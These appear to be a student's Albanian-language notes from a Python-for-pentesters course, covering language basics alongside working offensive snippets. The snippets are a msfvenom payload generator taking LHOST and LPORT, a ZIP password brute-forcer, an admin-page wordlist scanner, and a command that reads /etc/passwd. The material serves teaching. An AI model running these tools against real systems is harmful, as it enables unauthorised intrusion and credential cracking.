dardan:cyberacademy:module-6-python_for_pentesters
https://www.w3schools.com
##########################################################################################
27.08.2018, Day 1
python
build by hackers
can not exist as hacker without python
cka eshte programimi
cka eshte inzhinjeringu
cka eshte gjuha programuse
disa shtresa
me shenja - low level communication
me fol - high level
low level = communikojm me machine level
high level = me mujt me komuniku me human (python, java, c sharp etj)
modulet = librari
cka eshte python, dallimi me C
python nuk e kompajllon kodin
eshte gjuhe interpretuse
gj. kompajlluse - marrin kohe u executu, tani punon shpejt
gj. interpretuse - shpejt exekutohen, kadale ne long term
Day1
python
>>>
print "hello world"
variabla
>>> x = 1
>>> x = 12
>>> x = x + 1
string
" "
data types
string
integer
>>>x = "fsdfsdf"
>>>print type (x)
str
int - integjer, per numra
%r = cka do qe i jep e shitn ne thojza
%s
%d
True / False =
raw_input = kur lyp input prej userit
-------------------------------------------------
sfida 1
emrin
mbiemrin
moshen
gjinin
nacionalitetin
status
------------------------------------------------
sfida 2
emrin
mbiemi
ID
sa po don mi deponu
sa po don mi terheq
mosha
lokacioni
nenshtetsia
ne fund me parqit
shuma totale
sa jan terhek
sa jan mbet
##########################################################################################
29.08.2018, Day 2
variabla
var =
" " string
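# Three ways to build the same output line. name and surname are strings;
# num is assumed to be an integer (the %d placeholder expects one).
print("Name: {} Surname: {} Num {}".format(name, surname, num))  # str.format fills each {} in order
print("Name: %s Surname: %s Num: %d" % (name, surname, num))  # %-placeholders are filled by the % operator; .format() would leave them as literal text
print("Name: " + name + " Surname: " + surname + " Num: " + str(num))  # + only joins strings, so num is converted first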
me marr input prej userit
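target = raw_input("IP: ")  # raw_input returns exactly what was typed, as a str
# In Python 2, input() hands the typed text to eval(), so whoever types the
# answer can run arbitrary Python. Read text with raw_input() and convert it
# explicitly; int() raises ValueError when the text is not a number.
num = int(raw_input("Num: "))
print(num)
print(type(target))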
----------------------------------------------------------
nano argv.py
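import sys

# sys.argv is the list of command-line words. Running the script with fewer
# than two arguments raises IndexError on the lines below.
print("Script name %s" % sys.argv[0])  # [0] name of the script
print("Name %s" % sys.argv[1])  # [1] first argument: name
print("Surname %s" % sys.argv[2])  # [2] second argument: surname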
python argv.py
python argv.py argument1 argument2
-----------------------------------------------
libraria os
per sys admin
per hacking
multi OS
os.system("ls")
os.system("ping -c 1 www.google.com")
------
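import subprocess
import sys

host = sys.argv[1]
# A value starting with "-" would be read by ping as an option, not a host.
if host.startswith("-"):
    sys.exit("invalid host: {}".format(host))
# os.system() runs its string through a shell, so characters such as ; | & $
# in the argument would be interpreted as shell syntax. An argument list with
# no shell passes the value to ping as one plain argument.
subprocess.call(["ping", "-c", "1", host])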
python ping.py google.com
-------
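import subprocess
import sys

domain = raw_input("Domain: ")
# A value starting with "-" would be read by ping as an option, not a host.
if domain.startswith("-"):
    sys.exit("invalid domain: {}".format(domain))
# The typed text is untrusted input: passed through os.system() it would be
# parsed by a shell. An argument list hands it to ping as a single argument.
subprocess.call(["ping", "-c1", domain])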
python ping_raw.py
Domain: google.com
------------------------------------------
tips and tricks
get help pa internet
if import os
help(os)
------------------------------------------
nano update.py
import os

# Refresh the APT package lists; -y answers "yes" to any prompt.
update_command = "sudo apt-get update -y"
os.system(update_command)
python update.py
------------------------------------------
nano update.py
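import os

# A bare string on its own line is evaluated and thrown away; it has to be
# printed to show up on screen.
print("Starting update")
os.system("sudo apt-get update -y")
print("Update done")
os.system("ccat /etc/passwd")  # lists the local accounts; needs the ccat tool installed (plain cat gives the same content)
print("System users ...")
os.system("htop")  # interactive; the script waits here until htop is closed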
python update.py
------------------------------------------
find my public IP
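import urllib2

# The request goes over unencrypted HTTP to a third-party service, so the
# reply can be altered in transit; treat it as untrusted text.
# timeout keeps the script from hanging if the service does not answer.
response = urllib2.urlopen('http://ip.42.pl/raw', timeout=10)
print(response.read())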
------------------------------------------
MSF payload
#!/usr/bin/python
# Interactive wrapper: prompts for seven values and substitutes them into a
# single msfvenom command line that is run through the shell.
import os
import sys
print "-"*100
print ("\t\t\tCreating a payload of your choice")
print "-"*100
# Every answer is kept exactly as typed; nothing is validated or quoted.
sistemi = raw_input("\nType the os that you want to hack: ")
shell = raw_input("Type the payload form: ")
bind = raw_input("Type the communication form that u want to use: ")
ip = raw_input("Type you local ip: ")
port = raw_input("Type your port: ")
# NOTE: this name shadows the built-in format() for the rest of the script.
format = raw_input("Type format of the saving payload: ")
name = raw_input("Type the name of the paylaod: ")
print "-"*100
print "Now we will generate you payload, be patient....:)"
print "-"*100
# os.system() passes the finished string to a shell, which also performs the
# ">" redirection into "<name>.<format>". Because the answers are inserted
# unquoted, any shell metacharacter typed at a prompt is interpreted by that
# shell, and the output file name is whatever was typed for name and format.
# The return status is not checked, so "done" is printed even on failure.
os.system("msfvenom -p %s/%s/%s LHOST=%s LPORT=%s -f %s > %s.%s" %(sistemi, shell, bind, ip, port, format, name, format))
print "-"*100
print "Now its doneee"
print "-"*100
---------------------------------------------
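import urllib2
import requests  # the third-party HTTP library is called "requests"
import netaddr
import socket

requests.get("http://ickosovo.com")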
##########################################################################################
31.08.2018, Day 3
#BRUTEFORCING A ZIP PASSWORD FILE
nano BRUTEFORCE_A_ZIP_PASSWORD.py
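import sys
import zipfile

# argv[1] is the archive, argv[2] a text file with one candidate per line.
zip_file = zipfile.ZipFile(sys.argv[1])
with open(sys.argv[2], "r") as wordlist:  # the file is closed when the block ends
    for line in wordlist:
        password = line.rstrip()  # drop the trailing newline
        try:
            # extractall() raises when the candidate does not decrypt the
            # archive; on success the members are written into the current
            # directory, so run this from an empty working folder.
            zip_file.extractall(pwd=password)
            print("Password is: {}".format(password))
            break
        except Exception:
            # Failed candidate, try the next one. Catching Exception instead
            # of using a bare except lets Ctrl-C still stop the loop.
            pass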
python unzip.py file.zip pwd.txt
##########################################################################################
03.09.2018, Day 4
logical statements
import getpass
=
##########################################################################################
05.09.2018, Day 5
urllib2
requests
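import urllib2

# urlopen() needs the scheme; a bare "www.google.com" raises ValueError.
r = urllib2.urlopen("http://www.google.com")
print(r.getcode())  # status code
print(r.read())  # reads the response body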
example
mkdir 1
mkdir 2
mkdir 3
mkdir 4
nano index.html
test txt
------
nano web_b.py
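import urllib2
import sys

base_url = sys.argv[1]  # must include the scheme, e.g. http://127.0.0.1
for i in range(1, 5):  # requests <base_url>/1 through <base_url>/4
    try:
        r = urllib2.urlopen("{}/{}".format(base_url, i))
        print(r.getcode())
    except urllib2.HTTPError as err:
        # urlopen() raises HTTPError for 4xx/5xx answers instead of returning
        # them, so without this the first missing path would end the script.
        print(err.code)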
web fuzzer
ne gjet login page
>>>import requests
>>>r = requests.get("http://google.com")
>>>print r.status_code
200
>>>r = requests.get("http://127.0.0.1/dssd")
404
print type(r.status_code)
<type 'int'>
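# r is the response object returned by requests.get(); status_code is an int.
if r.status_code == 200:
    print("faqja ekzistion")  # "the page exists"
else:
    print("Nuk existon")  # "does not exist"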
>>> print r.status_code
--------------------
nano adminfinder.py
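import sys
import requests  # module name is "requests"

# argv[1] is the host, argv[2] a text file with one path per line.
with open(sys.argv[2], "r") as wordlist:  # the file is closed when the block ends
    for i in wordlist:
        i = i.rstrip()  # drop the trailing newline
        url = "http://{}/{}".format(sys.argv[1], i)
        r = requests.get(url)
        if r.status_code == 200:
            # The original format string had two placeholders for three
            # values, so the status code was silently dropped.
            print("{} {}".format(url, r.status_code))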
python adminfinder.py 127.0.0.1 common.txt
---------------------
download nje admin login wordlist
cd /var/www/html me wget url
rm -rf latest.zip
~/Desktop/working folder
python adminfinder.py 127.0.0.1 wordlist.txt
sudo apt-get install python-pip
sudo pip install requests
>>> import urllib2
>>> r = urllib2.urlopen("http://127.0.0.1/index.html")
>>> print r.read()
CA
>>> print r.read();
>>> if "CA" in r.read():
>>> if "CA" in data :
>>> print True
>>> r = urllib2.urlopen("http://127.0.0.1/index.html")
>>> if "CA" in r.read():
print True
True
--------------------------
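import requests

r = requests.get("http://ickosovo.com")  # the module is "requests"; a misspelled name raises NameError
print(r.text)  # response body decoded to text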
--------------------------
import requests

login_url = "http://ickosovo.com/login.php"
form_fields = {"user": "cyber"}
# data= sends the dict as a form-encoded POST body. The URL is plain http://,
# so the submitted fields travel unencrypted.
r = requests.post(login_url, data=form_fields)
-------------------------
